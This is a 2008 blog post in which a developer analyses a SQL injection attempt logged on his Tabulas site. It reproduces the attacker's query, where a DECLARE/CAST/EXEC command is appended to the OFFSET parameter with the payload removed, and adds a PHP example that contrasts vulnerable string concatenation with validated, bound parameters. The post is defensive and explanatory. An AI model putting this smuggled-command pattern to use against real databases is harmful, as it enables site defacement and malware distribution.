During my Tabulas code refactoring, I've turned on logging of all PHP fatal errors to disk and set all MySQL errors to be emailed to me. I got the following interesting error:

SELECT entry_id, entry_userid, entry_url, entry_title, entry_status, entry_created, entry_draft, entry_updated, entry_category, entry_comment, entry_iconid, entry_favorite, entry_sticky, entry_watching, entry_reading, entry_listening, entry_mood, entry_feeling, entry_html, entry_nl2br, entry_break, entry_commentcount, entry_related, entry_status_effective FROM entries, entry_metadata WHERE entries.entry_id = entry_metadata.entryid AND entry_userid = '106634' AND entry_status_effective IN (0) AND entry_updated < NOW() AND entry_draft = 0 ORDER BY entry_sticky DESC, entry_updated DESC LIMIT 6 OFFSET 0;DECLARE @S CHAR(4000);SET @S=CAST([hex-encoded payload removed] AS CHAR(4000));EXEC(@S);

How interesting! Somebody was using the offset parameter on the entries page for an injection attack! However, the GET param looked like junk until I showed it to Max, who de-hexed it:

This nice little code snippet looped through my whole database and would have updated every text field to include a JS script. (The DECLARE/CAST/EXEC syntax is Microsoft SQL Server T-SQL, which is why MySQL rejected the statement and the error landed in my inbox instead of the script landing in my tables.)
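The unsafe pattern behind the logged query, beside a hardened version, as an added example that is not Tabulas code: the table and column names come from the query above, while the `$pdo` connection, the function names and the validation helper are assumptions.

```php
<?php
// Added example, not Tabulas code. Assumes a PDO connection in $pdo and the
// entries table/columns seen in the logged query.

// VULNERABLE: the raw GET value is concatenated into the SQL string, so an
// offset such as "0;DECLARE @S CHAR(4000);..." becomes part of the query text.
function fetchEntriesUnsafe(PDO $pdo, string $userId, string $offset): array
{
    $sql = "SELECT entry_id, entry_title FROM entries "
         . "WHERE entry_userid = '$userId' AND entry_draft = 0 "
         . "ORDER BY entry_updated DESC LIMIT 6 OFFSET $offset";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED, step 1: accept only a non-negative integer for the offset.
// ctype_digit() rejects "", "-1", "1e3" and "0;DECLARE ..." alike.
function parseOffset(?string $raw): int
{
    if ($raw === null || !ctype_digit($raw)) {
        throw new InvalidArgumentException('offset must be a non-negative integer');
    }
    return (int) $raw;
}

// HARDENED, step 2: bind the values instead of interpolating them.
// PDO::PARAM_INT matters for LIMIT/OFFSET, which MySQL will not accept quoted.
function fetchEntriesSafe(PDO $pdo, int $userId, int $offset): array
{
    $stmt = $pdo->prepare(
        'SELECT entry_id, entry_title FROM entries '
      . 'WHERE entry_userid = :uid AND entry_draft = 0 '
      . 'ORDER BY entry_updated DESC LIMIT 6 OFFSET :off'
    );
    $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input modelled on the logged parameter: it is rejected before
// any SQL is built, and the rejection is logged so the attempt is still visible.
$raw = '0;DECLARE @S CHAR(4000);SET @S=CAST(0x00 AS CHAR(4000));EXEC(@S);';
try {
    $offset = parseOffset($raw);
} catch (InvalidArgumentException $e) {
    error_log('rejected offset parameter: ' . $raw);
}
```

With the validation in place the malformed offset never reaches MySQL, and the error_log() call keeps the same evidence trail the post relies on.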

Upon further inspection, the JS code embedded an <IFRAME> which loaded a Chinese page. This page, in turn, had the wonderful code snippet:


I'm running a Mac, but it looks like the JS tries to exploit ActiveX and do something real evil. Good thing I have a shred of competency when it comes to programming!

Posted by roy on September 14, 2008 at 08:44 PM in Web Development, Tabulas | 4 Comments



Comment posted on September 16th, 2008 at 01:03 PM
That's pretty cool really.
Comment posted on September 16th, 2008 at 02:38 AM
I can see that you blurred the link, but we could still see it in the title bar of your Mac. ;)

sanjuro (guest)

Comment posted on September 15th, 2008 at 01:44 PM
Interesting, but... it was just injected using the GET method and he did manage to append his code to the query? Sounds serious.

That reminds me also I have an error showing up in my profile page: http://sanjuro.tabulas.com/profile (don't pay attention to the rest of the blog, I need to erase everything and rebuild... someday)
Comment posted on September 15th, 2008 at 08:05 AM
Yeah, I tried hacking it to see if it was worthy of holding my thoughts in private.